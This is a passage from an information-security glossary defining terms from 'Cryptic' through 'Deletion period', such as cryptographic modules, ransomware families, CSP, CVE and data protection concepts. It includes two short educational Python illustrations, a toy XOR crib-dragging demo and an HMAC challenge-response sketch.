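            hits.append((off, bytes(key)))
    return hits

def recover(ct: bytes, crib: bytes):
    """Keys consistent with the crib, each paired with its full decryption."""
    return [(k, xor_cipher(ct, k)) for _, k in crib_drag(ct, crib)]
```

Trying all 65,536 keys without a crib yields 65,536 candidate decryptions and nothing to rank them by; with the crib b"DATE:" only one key survives, and a crib whose position is unknown (b"DAWN") locates itself by the same consistency test. With a real cipher the key is not read off by XOR, but the logic that a wrong key contradicts the crib is what the Bombe exploited against Enigma.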
|
Cryptic
|
Surreptitious, deliberately hidden, secretive, concealed
or non-obvious, such as a fiendishly difficult crossword puzzle. Not
necessarily unauthorized
or malicious.
See also covert.
|
Cryptocurrency
|
Tradeable virtual currency such as Bitcoin and Litecoin.
Protected against counterfeiting
by cryptographic
means including blockchain.
Generated by cryptomining.
|
Cryptogram
|
See cyphertext.
|
Cryptographic erase
|
With various important provisos concerning the level of risk,
overall process, technology, algorithm,
key length and complexity
etc., encrypting
data or perhaps
overwriting it with cyphertext,
and then destroying the key, may render confidential information ‘permanently’ irretrievable.
“Method of sanitization in which the encryption key for the encrypted
target data is sanitized, making recovery of the decrypted target data
infeasible” (ISO/IEC
27040).
|
Cryptographic
module
|
Tamper-resistant computer subsystem consisting of data processing, storage and communications hardware and firmware (and perhaps software), designed to perform cryptographic operations on keys that never leave its boundary, such as receiving a nonce, signing or encrypting it with a private key held inside the module and returning the result in a challenge-response authentication scenario. HSMs, smart cards and TPMs are examples; security requirements for such modules are specified in FIPS 140 and ISO/IEC 19790.
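Added illustration (not from the glossary): the challenge-response exchange described in the entry, with the verifier issuing a random nonce and the module answering from a key it never exposes. It uses an HMAC over a shared secret from the standard library, where a real module would typically sign the nonce with an asymmetric private key; the class and function names are hypothetical.

```python
"""Nonce challenge-response between a verifier and a (software stand-in)
cryptographic module. Added example, not from the glossary: uses an HMAC
over a shared secret from the standard library, where a real module would
typically sign the nonce with an asymmetric private key that never leaves
the hardware. Class and function names are hypothetical."""
import hashlib
import hmac
import secrets

class ToyModule:
    """Holds the key and exposes one operation: answer a challenge.
    There is deliberately no method that returns the key."""
    def __init__(self, key: bytes):
        self._key = key

    def respond(self, nonce: bytes) -> bytes:
        return hmac.new(self._key, nonce, hashlib.sha256).digest()

class Verifier:
    def __init__(self, key: bytes):
        self._key = key
        self._outstanding = set()   # nonces issued but not yet answered

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)   # fresh and unpredictable
        self._outstanding.add(nonce)
        return nonce

    def verify(self, nonce: bytes, response: bytes) -> bool:
        """Accept a response once, for a nonce we actually issued, and only
        if it matches; a captured response cannot be replayed later."""
        if nonce not in self._outstanding:
            return False
        self._outstanding.discard(nonce)
        expected = hmac.new(self._key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant time

def run_protocol(module: ToyModule, verifier: Verifier):
    """One round: challenge, response, verdict."""
    nonce = verifier.challenge()
    response = module.respond(nonce)
    return nonce, response, verifier.verify(nonce, response)
```

Two details carry the security: the nonce is random and single-use, so an eavesdropper who records a response gains nothing for the next round, and the comparison is constant-time, so response bytes cannot be guessed one at a time from timing.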
|
Cryptography,
cryptographic,
crypto
|
From the Greek words for “hidden” and “writing”, the
science, study and practice of creating systems to hide information and to find and retrieve it
when needed. Involves the use of mathematical algorithms for encryption, hashing, authentication etc.
|
Cryptographic protocol
|
Specified algorithms,
parameters (such as key
length) and processes
for establishing, using and managing cryptographic authentication, encryption etc. “An agreed standard
for secure communication between two or more entities” (NZ information Security Manual).
|
Cryptographic system
|
“A related set of hardware or software used for cryptographic
communication, processing or storage, and the administrative framework in
which it operates” (NZ information Security Manual).
|
Cryptographic system material
|
“Material that includes, but is not limited to, key,
equipment, devices, documents and firmware or software that embodies or
describes cryptographic logic” (NZ information Security Manual).
|
CryptoLocker
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
Cryptology,
crypto
|
Literally, the study of ‘hidden writing’ which encompasses
both cryptography
and cryptanalysis.
Confusingly also sometimes abbreviated to ‘crypto’.
|
Cryptominer,
cryptomining,
cryptojacking
|
Application that performs the computation by which a cryptocurrency network validates transactions and mints new coins, consuming significant processing (CPU, GPU or dedicated ASIC) and electrical power in the process. Cryptojacking is running a miner on someone else’s systems without their knowledge and consent, whether via malware or via JavaScript in a web page that mines for as long as the page is open, so that the victim pays for the power and the criminal keeps the coins. Along with spyware, identity fraud, intellectual property theft and coercion (ransomware), it is a way for criminals to make money from malware-infected systems.
|
Cryptonym
|
An innocuous code-name assigned to a project, assignment,
system, individual, organisation, incident etc. to reduce the possibility of
disclosing sensitive
information.
|
Cryptoperiod
|
“The useful life of the cryptographic key” (NZ information Security Manual).
|
Cryptoprimitive,
cryptographic primitive
|
See cryptographic
algorithm.
|
Cryptorbit
|
A species
of ransomware
in the wild in
2016.
|
Cryptosystem
|
Computer system
or device that
employs cryptography.
Generally taken to include the cryptographic
algorithm, the
key management processes, external
interfaces, software
supporting operations and sometimes even the entire PKI.
|
Cryptovariable
|
See key.
|
Cryptowall
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
CryptXXX
|
A species
of ransomware
in the wild. Flaws in the cryptosystem
implementation substantially weakened this malware.
|
Cryzip
|
One of the earliest
species of data-encrypting ransomware, in the wild in 2006.
|
CS
(Control Strength)
|
One of the parameters in the FAIR method, CS estimates the ability for
controls to
mitigate risks
(actually, to ‘reduce vulnerabilities’
in FAIR terms) to information
assets under analysis. Strong controls are well designed, fully implemented, highly
effective, robust/resilient,
unlikely to be bypassed/disabled, used, managed, maintained etc. See
also PLM, LEF, TCap and TEF.
|
CSA
(Cloud Security Alliance)
|
Industry body for CSPs
and their customers, promoting good practices in the information security, privacy and risk aspects of cloud computing. Cf. Control Self-Assessment.
|
CSE
(Communications Security Establishment)
|
Canada’s techno-spooks,
whose mission is to “provide and protect information of [Canadian] national
interest through leading-edge technology”. Responsible for SIGINT, surveillance etc.
|
CSF
(Cyber Security Framework)
|
See NIST CSF.
|
CSIS
(Canadian Security Intelligence Service)
|
Canada’s national intelligence agency.
|
CSP
(Cloud Service Provider)
|
An organisation
offering cloud
computing services, usually on a commercial basis.
|
CSP
(Content Security Policy)
|
A Content-Security-Policy HTTP response header (or equivalent <meta> element in the page’s HTML head) telling the browser which sources of content an appropriately-coded web page may load or run, for example refusing inline scripts and refusing scripts, styles, fonts, frames etc. from any origin other than those listed, so that JavaScript injected by XSS or other code injection attacks is not executed. Browser extensions are generally exempt from a page’s CSP and can inject content regardless; that is by design rather than a flaw in the policy, and the presence of malicious extensions on a system indicates more significant issues. CSP is defence in depth, not a substitute for fixing the injection.
|
CSR
(Corporate Social Responsibility),
corporate sustainability, conscience or citizenship, sustainable or
responsible business,
conscious capitalism
|
An emerging form of organisational self-regulation intended
for organisations to be seen to achieve wider social and ethical objectives, in
addition to conventional (capitalist, competitive, profit-driven) business
objectives. In the information
security context, CSR typically concerns privacy and integrity, for example not intrusively
capturing and exploiting
personal
information about workers
and third parties, and overtly supporting the Internet rather than merely using it.
|
CTB-locker
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
CTF
(Capture The Flag)
|
(a) A security competition in which individuals or teams solve challenges (exploitation, reverse engineering, cryptanalysis, forensics, web hacking etc.) to retrieve secret tokens (the flags), either ‘jeopardy-style’ from a board of independent tasks or ‘attack-defence’ style, each team defending its own vulnerable services while attacking the others’. (b) Simulation of an attack, or a planned campaign consisting of multiple attacks, on an organisation or its sites, networks, IT systems or parts thereof, in which the side on the offensive (commonly called the red team) attempts to place markers (such as fake bombs) and/or retrieve pre-designated information (the flags) to prove that they largely or completely defeated the defenders (the blue team). See also purple team.
|
CUI
(Controlled Unclassified Information)
|
US government term for unclassified information that nevertheless requires
some degree of protection,
typically for legal compliance
reasons (e.g. privacy).
Structured into categories such as critical infrastructure; defense; export
control; financial etc. Intended to replace myriad similar terms
(such as SBU and FOUO) now
officially deprecated.
|
Custodian
|
Temporary/surrogate owner who takes possession of, and is reasonably
expected to care for and protect, an information asset, acting on behalf and
in the best interests of its true owner. “Person or entity that has
custody, ownership, control or possession of Electronically Stored
Information” (ISO/IEC
27050-1).
|
CVE
(Common Vulnerabilities and Exposures)
|
MITRE’s reference list of publicly disclosed software security vulnerabilities, each assigned a unique identifier of the form CVE-YYYY-NNNN (year, then a sequence number of four or more digits) by MITRE or a CVE Numbering Authority (CNA) such as a vendor, so that advisories, scanners and patches can refer to the same flaw unambiguously. Entries are identifiers with short descriptions and references; severity scores and fuller detail are added by databases built on top of it, such as the NVD. See cve.mitre.org and CWE.
|
CVV (Card Verification
Value), CVV2 (2nd generation CVV),
CSC (Card Security Code),
CAV (Card Authentication Value),
CAV2 (2nd generation CAV),
CVC (Card Validation Code), CVC2 (2nd generation CVC), CID (Card Identification
Number)
|
Card authentication values. The first-generation value (CVV, CVC, CAV) is encoded in the magnetic stripe and checked by the issuer when the card is swiped; the second-generation value (CVV2, CVC2, CAV2, CID) is a 3 or 4-digit decimal number printed rather than embossed on the credit/debit/bank card, intended to show that whoever is quoting the card number over the phone or Internet has the physical card in hand. Under PCI DSS these are ‘sensitive authentication data’ and must never be stored by a merchant after authorisation, even encrypted: once used to authorise the transaction, the value should be erased from memory so that if the merchant’s systems are ever compromised by crackers, they will not gain the fullz … provided they haven’t installed their own data monitoring/logging software (a RAM scraper or web skimmer) to capture the data in transit or during processing.
|
CWE
(Common Weakness Enumeration)
|
MITRE’s community-developed dictionary of commonplace
types or classes of software
security vulnerabilities.
Grew out of the CVE.
See cwe.mitre.org.
|
Cyber
|
From the Greek kybernetes (steersman), adopted by Norbert Wiener for ‘cybernetics’ (1948), the study of control and communication in machines and living things; hence governance and control, and latterly computing and related ICT, particularly the Internet. A jargon prefix/buzz-word, much abused by marketers, journalists, politicians etc. and widely misinterpreted. Inconsistently hyphenated-too. Prefixed “cyber”, almost any term appears hi-tech and novel whereas in fact most are old hat.
|
Cyber-Armageddon,
cybergeddon
|
A full-blown unrestrained cyberwar between highly capable and
well-resourced nations or groups would undoubtedly inflict devastating
economic damage with horrendous social consequences on a global scale,
analogous to the nuclear weapons posturing and threats of MAD (Mutually-Assured
Destruction) during the Cold War.
|
Cyberattack,
cyber attack,
cyber-attack
|
An attack
staged primarily through electronic means, particularly through the Internet. “An
attack, via cyberspace, targeting an enterprise’s use of cyberspace for the
purpose of disrupting, disabling, destroying, or maliciously controlling a
computing environment/infrastructure; or destroying the integrity of the data
or stealing controlled information” (CNSSI-4009).
“Malicious attempts to exploit vulnerabilities in information systems or
physical systems in cyberspace and to damage, disrupt or gain unauthorized
access to these systems” (ISO/IEC
27100 [draft]).
|
Cyberbully
|
Someone who uses social media, email etc. to harass, intimidate, threaten, coerce and/or traumatize victims.
|
Cyber
command
|
Military command center for cyber operations, such as the US Cyber
Command reportedly based at Fort Meade, Maryland.
|
Cybercrime
|
The commission of criminal acts in cyberspace. More informally, the use or exploitation of ICT and/or the Internet to
commit crime.
|
Cybercrook,
cybercriminal
|
Someone who uses IT systems and networks (particularly the Internet) to commit crime.
|
Cyberespionage,
cyberspying
|
Use of IT
systems and networks
(particularly the Internet)
to spy on targets.
|
Cyber-extortion
|
Criminal exploitation of illegitimate access to and control over sensitive and/or valuable information in order to coerce victims out of money etc. Attacks
typically involve the use of hacking, malware (e.g. ransomware),
theft of data storage media or ICT devices, and/or social
engineering. See also extortion.
|
Cyber
harassment
|
Harassment or coercion conducted through the Internet, generally, such as revenge porn and spam bombing.
|
Cyber
incident
|
Information security incident involving ICT. “Actions taken through the use of computer
networks that result in an actual or potentially adverse effect on an
information system and/or the information residing therein. See incident.” (CNSSI-4009).
|
Cyberinfrastructure
|
The ICT
elements of global, national or corporate infrastructures, especially
automated systems
interconnected through networks
such as the Internet.
|
Cyberinsurance,
cyber insurance, cyber risk insurance
|
Insurance against specified cyber-risks, a form of risk sharing.
|
Cyber
persona
|
“Digital representation of an individual or organisation
necessary to interact in cyberspace” (ISO/IEC 27101 draft).
|
Cyber-prepping
|
Preparing to survive cyberwar or extreme cyber incidents
including post-apocalyptic social disorder and infrastructural collapse.
|
Cyberpunk
|
(a) A science fiction genre characterized by classic
futuristic ICT works
such as William Gibson’s Neuromancer. (b) A proudly nonconformist anti-establishment
youth with a deep fascination for the cyber world and hacking plus, often, piercings, tattoos
and a curious obsession with black clothing.
|
Cyber
resilience
|
Resilience,
robustness and stability of the cyberinfrastructure. “The ability of
an organisation to continue to carry out its mission by anticipating and
adapting to cyber threats and other relevant changes in the environment and
by withstanding, containing and rapidly recovering from cyber incidents”
(Financial Stability Board Cyber Lexicon, November 2018).
|
Cyber-risk,
cyber risk,
cyberrisk
|
Potentially damaging or harmful situation involving data, ICT, networking etc., particularly
deliberate attacks
by hackers, extortionists,
criminals, social
engineers, fraudsters,
terrorists or other competent adversaries.
|
Cybersecurity,
cyber-security,
cyber security
|
Primarily refers to technical/ICT security controls protecting computer systems, networks and the associated data, in other words IT security.
However, the definition is sometimes widened to include information security as a whole, while
some narrow it to refer to defensive measures within cyberwarfare, Internet security,
critical [national] infrastructure
security, and/or securing virtual worlds. Caveat lector. “The
ability to protect or defend the use of cyberspace from cyber attacks” (CNSSI-4009).
“The process of protecting information by preventing, detecting, and
responding to attacks” (NIST Cybersecurity Framework).
“Includes any processes, practices or technologies that organisations have in
place to secure their networks, computers, programs or the data they hold
from damage, attack or unauthorised access." (UK Government Department
for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2018: Technical Annex).
|
Cybersecurity framework
|
“Basic set of concepts used to organise and communicate
cybersecurity activities” (ISO/IEC 27101 draft).
|
Cyberspace
|
Vague term, not yet consistently defined, used and
understood, typically referring vaguely to ICT, particularly the Internet, and sometimes Internet
culture, virtual
systems, virtual worlds, collaborative working, social media etc.
“A global domain within the information environment consisting of the
interdependent network of information systems infrastructures including the
Internet, telecommunications networks, computer systems, and embedded
processors and controllers” (CNSSI-4009).
|
Cybersquatting
|
Registering, trafficking in or using domain names that match or closely resemble someone else’s trademark in bad faith, for example to resell them to the trademark owner at a profit, to divert traffic, or to host phishing, fraud or other attacks using copycat or lookalike domain names or URLs. See also typosquatting.
|
Cyber
stalking
|
Grooming or snooping on victims through the Internet, generally, typically
continuing to contact and coerce
them after being asked or told to desist.
|
Cyberstrike
|
An attack
in, on or through cyberspace.
|
Cybertage
|
Sabotage
in cyberspace
that compromises
IT systems/devices, databases, networks, data or information e.g. destroys or
damages them, interrupts or delays business activities, or leads to the loss
of valuable business or the inappropriate disclosure of confidential information. Whereas
sabotage usually implies inflicting physical damage (such as arson), cybertage
often affects intangible information
assets (e.g. using malware such as ransomware).
|
Cyberterrorism
|
The commission of terrorist acts in cyberspace. More informally, the use or exploitation of ICT to commit
terrorism.
|
Cyberteur
|
Person who commits cybertage, such as a mole.
|
Cyberthreat
|
Threat
or threat agent
active in the cybersecurity
domain - particularly substantial, highly capable ones backed by governments
and other resourceful and determined adversaries.
|
Cyber-vandalism
|
Computer-enabled wanton damage, or wanton damage of
computers.
|
Cyber-vigilante
|
Person who uses hacking, malware, social engineering etc. to pursue, expose or punish alleged wrongdoers outside the law (e.g. hacking back, doxxing), often in furtherance of a personal agenda or obsession. Whatever the motive, the activities may themselves be illegal and, like a counterstrike, may hit the wrong target.
|
Cyberwar,
cyber-war,
cyber war,
cyberwarfare,
information warfare
|
The deliberate exploitation
of vulnerabilities
in an adversary’s
computing and telecommunications capabilities, networks etc. by a nation state as
an act of war intended to disrupt vital parts or the entirety of their critical [national] infrastructure,
disable their national defences
and offensive
capabilities, inflict crippling economic damage etc. Due to
exclusions in the small print for ‘acts of war’, incidents classed as
cyberwar attacks may not be covered by cyberinsurance. See also cyber-Armageddon.
|
Cyberweapon
|
Tool or technique (such as a computer, malware, hacking, social engineering, cybertage, spying, coercion or EMP weapon) capable of being used
offensively to attack
an adversary’s
critical infrastructure
as part of cyberwar
or a similar military mission, and/or to defend against such attacks.
|
CybOX
(Cyber Observable eXpression)
|
A schema for specifying, capturing, characterizing and communicating/sharing IT system and network events and properties (files, processes, network connections, registry keys etc.) for event management and logging, malware characterisation, intrusion detection/prevention, incident response and digital forensics. Absorbed into STIX version 2, where its constructs survive as ‘cyber observable objects’. See also STIX and TAXII.
|
Cylinder
lock
|
The most common form of physical lock, used on many front doors. When
someone inserts the correct key
into the keyway,
internal pins are lifted to exactly the right positions to allow the plug to be rotated in
the hull, thereby
retracting the latch so the door can be opened.
|
Cynefin
framework
|
A framework
or conceptual model concerning situations or systems that are described as simple
(stable and predictable), complicated (largely predictable through
cause-and-effect relationships), complex (largely unpredictable,
linkages rationalized only after the fact), chaotic (inherently
unstable and unpredictable) or disordered (of unknown status).
Different modes of thinking, controlling
or directing, planning and responding are appropriate in each case.
|
Cypher-
|
An archaic British spelling of cipher that, paradoxically, is used in
some modern compound words concerning cryptography. See algorithm.
|
Cyphertext,
cryptogram
|
Unintelligible string such as
HbAaKhBsaao)X]*AX551&*S66 that makes no sense to a human reader but which
can be transformed back into the corresponding plaintext using the correct cryptographic algorithm/s and encryption key/s.
|
Darknet,
Darkweb,
dark Web, invisible Web, hidden Web
|
Loosely, the covert and illicit part of the Web. Strictly, three different things get lumped together: the deep Web is simply content that search engines do not index (paywalled, dynamic or login-protected pages, most of it mundane); a darknet is an overlay network reachable only with specific software, configuration or keys (such as Tor onion services or I2P), much of it legitimate; and the dark Web is the content hosted on darknets, some of it offering criminal/black market services and tools such as hacking, RaaS, money laundering and illegal drugs. Aside from being invisible to search engine spiders, such sites and apps are inaccessible to users who lack the requisite access authority, knowledge, keys and/or tools.
|
Dash[board] cam[era],
dashcam
|
CCTV camera mounted in or on a vehicle (not necessarily
literally on the dashboard) to record traffic incidents, bad driving, road rage, accidents etc.
A form of surveillance.
See also body cam.
|
DAST
(Dynamic Application
Security Testing)
|
In effect, penetration
testing of an application,
checking (from the network
perspective) whether its exposed ports and services have known vulnerabilities.
See also SAST and IAST.
|
Data
|
Electronic representations of information within a computer system or network. In
digital computers, data (and indeed software) consists of sequences of
logical ones and zeroes known as bits. Strictly speaking, data is the plural
of “datum” but it is widely used in the singular. “Collection of values
assigned to base measures, derived measures and/or indicators. Note: this
definition applies only within the context of ISO/IEC 27004:2009” (ISO/IEC
15939:2007).
|
Data Analytics
(DA)
|
Fancy marketing term for the common-or-garden study and
analysis of data.
Typically involves the use of statistics to examine and glean useful information
from large data sets, also known as big data.
|
Data
at rest
|
Digital bits-n-bytes taking a well-earned break from the
daily grind? Alternatively, “Data stored on stable non-volatile storage”
(ISO/IEC 27040).
“Information residing on media or a system that is not powered or is
unauthenticated to” (NZ information Security Manual).
Cf. data in motion.
|
Database
(db)
|
Structured and managed collection of data. The structure and accumulation of
data, along with the software
functions to manage, manipulate and report them, usually make databases far
more valuable than plain, unmanaged ‘flat files’ or simple lists and tables.
The most important computer systems
often are databases, making database security controls such as those protecting data integrity a
vital part of information
security.
|
DataBase
Administrator
(DBA)
|
Privileged
user who administers (manages) databases. Normally responsible for
running the DBMS,
configuring, maintaining and tuning databases e.g. setting up user rôles and
defining their access
rights to tables and cells, monitoring security logs etc.
|
Data
breach
|
A breach
involving data. “Compromise
of security that leads to the accidental or unlawful destruction, loss,
alteration, unauthorized disclosure of, or access to protected data
transmitted, stored or otherwise processed” (ISO/IEC 27040).
|
Data concerning health
|
“Personal data related to the physical or mental health
of a natural person, including the provision of health care services, which
reveal information about his or her health status” (GDPR). See also PHI.
|
Data
controller
|
The organisation
or person gathering, holding and using personal information, responsible for
ensuring it is adequately secured in order to protect the data subjects’ privacy. Accountable for securing the information,
even if it is processed by a separate organisation (a data processor).
|
Data
dictionary
|
Formal description of the data fields of records in a database, ideally including their information security
characteristics.
|
Data
in motion
|
Digital bits-n-bytes on the move, jiggling about,
steadfastly refusing to stay still and be counted? Alternatively, “Data
being transferred from one location to another. Note: These transfers
typically involve interfaces that are accessible and do not include internal
transfers (i.e., never exposed to outside of an interface, chip, or device)”
(ISO/IEC 27040).
Cf. data at
rest.
|
Data
in transit
|
“Information that is being conveyed across a
communication medium” (NZ information Security Manual).
See also data in motion.
|
Data
in use
|
Data
currently being processed.
“Information that has been decrypted for processing by a system” (NZ information Security Manual).
|
Data
miner
|
Form of malware
that covertly
collects information
on web users, for
example secretly recording personal information submitted by users
of online forms.
|
Data
objects
|
“Elements which contain PII. Example: such elements
are for instance files, documents, records or attributes. Concrete data
objects may be e.g. invoices, contracts, personal files, visitor lists,
personnel planning sheets, user accounts, log entries, consent documents, and
so on. Note: Data objects can be combined with other data objects in a
cluster of PII. The individual data object can be of varying complexity.” (ISO/IEC 27555
draft).
|
Data
spill
|
“An information security incident that occurs when
information is transferred between two security domains by an unauthorised
means. This can include from a classified network to a less classified
network or between two areas with different need-to-know requirements” (NZ information Security Manual).
|
Data Processing
(DP)
|
Prehistoric term for what is now commonly known as the ICT
function/department/team or simply “IT”.
|
Data
processor
|
An organisation
that processes personal
information on behalf of another (the data controller). Typically, an ICT or cloud computing
services company.
|
Data protection
|
See information protection.
|
Data Protection Directive
|
“Directive 95/46/EC of the European Parliament and of
the Council on the protection of individuals with regard to the processing of
personal data and on the free movement of such data” which sought to
harmonize information
protection or privacy
laws across the European Union and further afield (e.g. Australia,
Canada and New Zealand). Being replaced by GDPR.
|
Data
remanence
|
“Residual information remaining on a device or storage
media after clearing or sanitising the device or media. Sometimes described
as data persistence” (NZ information Security Manual).
See also remanence.
|
Data security
|
See IT
security.
|
Datasploit
|
Application
supporting both offensive use of, and defence
against, social
engineering attacks.
Mines open source
intelligence sources and correlates information on individuals,
domains, email
addresses, phone numbers etc. An example of dual-use technology, popular with black-, grey- and white-hats. See
also Burp suite and
Maltego.
|
Data stealing/thieving/theft malware
|
Malware
that surreptitiously harvests and exfiltrates valuable proprietary information or personal
information from infected
systems and networks to be exploited directly
or sold on the black
market.
|
Data
subject
|
The person whose personal information it is.
|
DBMS
(DataBase
Management System)
|
Specialized software
system supporting
database applications. Provides
management
functions to organise data
(usually in the form of tables, matrices, lists or sets) and data security (e.g. enforcing
referential
integrity). Provides a standardized interface or abstraction layer
between the application and the underlying operating system and hardware. Heavily optimized for
performance and throughput, for example caching frequently-accessed data to
reduce disk reads. Cf. management system (in the ISO sense).
|
DCS
(Distributed [or
Digital] Control System)
|
Originally a term for a process control computer system that uses digital computer
technology rather than analogue electro-mechanical controls. Latterly used
to denote SCADA-like
ICS distributed
around the plant and operating semi-autonomously.
|
DCU
(Data Collection
Unit),
pod
|
Network
node or thing
that gathers data
from other things such as distributed sensors, smart meters etc. and forwards it
to a central system,
passing commands in the opposite direction. Used in ICS/SCADA, IIoT
and IoT.
|
DDoS
(Distributed Denial of Service)
|
Type of DoS attack using numerous attacking systems (typically bots) to generate large
volumes of network
traffic, thereby flooding and possibly swamping (overloading) the target systems or network,
causing them to stop providing ICT
services. See also DRDoS.
|
DEA
(Data Encryption
Algorithm)
|
Symmetric
encryption algorithm
specified in FIPS PUB 46 in 1977 for the Data Encryption Standard DES.
|
Dead drop
|
See drop.
|
Dead Letter Box (DLB)
|
See drop.
|
Dead
double
|
Identity
thief who assumes the identity
of a dead person.
|
Deception,
deceit
|
Lying, lie, fabrication or deliberate, manipulative
concealment of the truth.
|
Deception
technology
|
[Marketing] term for advanced honeypot systems designed to lure, divert, contain
and gather information
(intelligence)
on hackers inside
corporate networks,
all the while deceiving them into believing they are genuinely gathering reconnaissance,
exploiting vulnerabilities
and capturing flags.
A potentially valuable approach in some circumstances, but potentially costly
and risky too (e.g. distracting,
diverting and misleading cybersecurity
resources while engendering a false sense of security).
|
Decision
criteria
|
“Thresholds, targets, or patterns used to determine the
need for action or further investigation, or to describe the level of
confidence in a given result” (ISO/IEC 15939:2007).
|
Declassification
|
The authorized
removal or downgrading of classification
level on information
for which the current class is no longer appropriate (e.g. outdated,
irrelevant or already disclosed),
thereby increasing permitted
access. “A
process whereby information is reduced to an unclassified state and an
administrative decision is made to formally authorise its release into the
public domain” (NZ information Security Manual).
See also redaction.
|
Decode
|
Convert coded
messages into their plaintext
equivalents, if necessary using the correct section, page and entries in a code book.
|
Decrypt,
decryption,
decipher
|
Reversal of the encryption process requiring the correct key to recover the
original plaintext
from the cyphertext
(where possible).
|
Decryptor
|
Some early ransomware
had cryptographic
design flaws or coding bugs, allowing encrypted files
to be decrypted
using utilities released by antivirus
companies without victims
having to pay the ransom.
Most current ransomware is better designed and coded, making encrypted files
useless without the necessary decryption key.
|
Deduplication
|
Reduction or elimination of redundant information. “Method
of reducing storage needs by eliminating redundant data, which is replaced
with a pointer to the unique data copy. Note: Deduplication is sometimes
considered a form of compression” (ISO/IEC 27040).
|
Deep
cover
|
Infiltrating
a target organisation
so effectively that the infiltrator becomes highly trusted and may gain privileged access to its innermost secrets, albeit
increasing the risk
of the agent being
turned or going native.
See also mole and sleeper.
|
Deep
fake
|
Advanced audio-visual techniques can ‘put words into the
mouths’ of celebrities, politicians, activists and adversaries, making them appear
to express something they did not. Just as written materials can be edited
or fabricated, small changes to genuine audio-visual content (such as
deleting the word “not” or changing a frown into a smile) are relatively easy
to make seamlessly, yet can dramatically affect the meaning or interpretation
of, say, a political speech or public statement. As the techniques advance
through artificial intelligence, neural networks and deep learning,
wholescale changes are becoming easier to make and harder to spot,
potentially leading to de novo fabrication of lengthy video clips in
fake settings with fake audiences. There are serious implications for
society through large-scale social engineering such as fake news, fraud, espionage, information warfare and cyberwar,
threatening forensics,
authority, accountability
and trust.
|
Deep packet inspection
|
Third generation firewalls can examine the payloads (data content) of network packets, as well as
the IP addresses and protocol
information
in the packet headers, in order to apply more granular security rules. Their ability to access the content of network traffic
raises privacy
and confidentiality
concerns: these are trusted
devices.
|
Deep
Web, Deepweb,
Deep net, Deepnet
|
Internet
sites and services that are not readily accessible and searchable using
conventional search engines such as Google. Includes the Darknet, plus web pages and servers protected behind
corporate firewalls.
|
Defame,
defamation,
defamatory
|
Stating or implying something false that unduly harms the
image and reputation
of another person. Note that a true i.e. factually accurate
statement, by definition, is not defamatory though it may be distinctly
uncomplimentary. See also libel
and slander.
|
Default
|
Pre-set configuration. Straight out of the box,
newly-installed software
and hardware
typically has standardized and convenient but relatively weak security settings,
for example passwords
that are widely known in the hacker
community, and pass-all settings.
|
Default
deny,
need-to-know
|
Access
control principle
stating that information
should only be released to authenticated
individuals if they have a legitimate
purpose or reason for using the information, and are authorized to do so.
|
Default
permit,
need-to-withhold
|
Access
control principle
stating that information
should normally be released or disclosed
unless such access
needs to be explicitly denied for some specific, legitimate reason.
|
Defect
|
An identified bug,
flaw or other
inherent issue with a system,
process, person, organisation etc.
|
Defence-in-depth
|
Control
principle
whereby multiple overlapping or complementary ‘layers’ of protection are applied, all of which
would have to be breached,
overcome, disabled or bypassed in order to impact or compromise the protected information assets.
This is a structured, systematic approach, more than simply increasing the
number of controls. “A layered combination of complementary
countermeasures” (Official ISC2 Guide to the CISSP CBK, 2007, page
282).
|
Defensive security,
passive security,
reactive security
|
Security
practices that deter,
prevent,
react or respond to attacks
and other incidents,
generally by minimizing vulnerabilities
and/or impacts,
for instance using silent
alarms, tell-tales
or whistleblowers’
hotlines coupled with highly efficient incident response practices to react
quickly and decisively to the very earliest signs of trouble. Cf. offensive security.
|
Defraud
|
To commit or perpetrate fraud.
|
Degauss
|
Secure
erasure process
that applies an extremely strong magnetic field to magnetic data storage media
such as computer disks or tapes to destroy the stored data. In addition to
concerns over the equipment and operating procedures, the extremely high
density of modern magnetic storage methods,
high coercivity
of the materials, and use of RAID and similar redundant storage/error correction techniques make
degaussing less reliable in practice than it may appear, although subsequent
physical destruction
of degaussed media increases assurance.
“Render data unreadable by applying a strong magnetic field to the media”
(ISO/IEC 27040).
|
Degausser
|
A device
that degausses.
“An electrical device or permanent magnet assembly which generates a
coercive magnetic force to destroy magnetic storage patterns in order to
sanitise magnetic media.” (NZ information Security Manual).
|
Delegated authority,
delegation
|
Refers to someone passing some of their responsibility
and power to a subordinate within specified parameters, for example giving
them the ability to sign-off (authorize)
expenses claims or procurement orders up to a certain dollar value. Implies
a level of trust
in the subordinate, often supported by additional controls. While the
authorized person is personally accountable for any incidents arising from their actions and
inactions, the more senior person generally shares some of the accountability
since he/she made the decision to delegate.
|
Deletion,
disposition mechanism, erasure,
destruction,
destruction of data storage media,
anonymisation of data
|
“Process by which PII is
changed in an irreversible manner so that it is no longer present or
recognizable and cannot be used or reconstructed after the process. Notes:
(1) As a rule, “secure deletion” is required. Secure deletion means that
reconstruction of the data is either impossible or requires substantial
effort (in human resources, means, time). For selecting the deletion methods,
the need for protection of the data concerned is to be taken into account;
(2) Equally, an alternative way to reach the goal of deletion is
anonymisation. Further guidance on anonymisation (as a de-identification
technique) can be found in ISO/IEC 20889:2018-11 (1st edition) — Privacy
enhancing data de-identification terminology and classification of
techniques; (3) the term ‘deletion’ covers all such synonyms: disposition
mechanism, erasure, destruction, destruction of data storage media,
anonymization of data.” (ISO/IEC 27555 draft).
|
Deletion
class
|
“Combination of a standard
deletion period and an abstract starting point for the period run. Note: All
clusters of PII which are subject to the same deletion period and the same
abstract starting point are combined in a deletion class. As opposed to the
(specific) deletion rule for a cluster of PII, the (abstract) deletion class
relates only to the abstract starting point and not to a specific condition
for the start of the period run (see also [clause] 8).” (ISO/IEC 27555 draft).
|
Deletion framework
|
“Policy documents and
implementation mechanisms by means of which a PII controller ensures that its
pools of personally identifiable information are deleted in accordance with
the applicable legislation and/or regulation.” (ISO/IEC 27555 draft).
|
Deletion
period
|
“Time period after which a
specific cluster of PII should be deleted. Note: As a generic term, the
deletion period comprises all deletion periods. This includes the
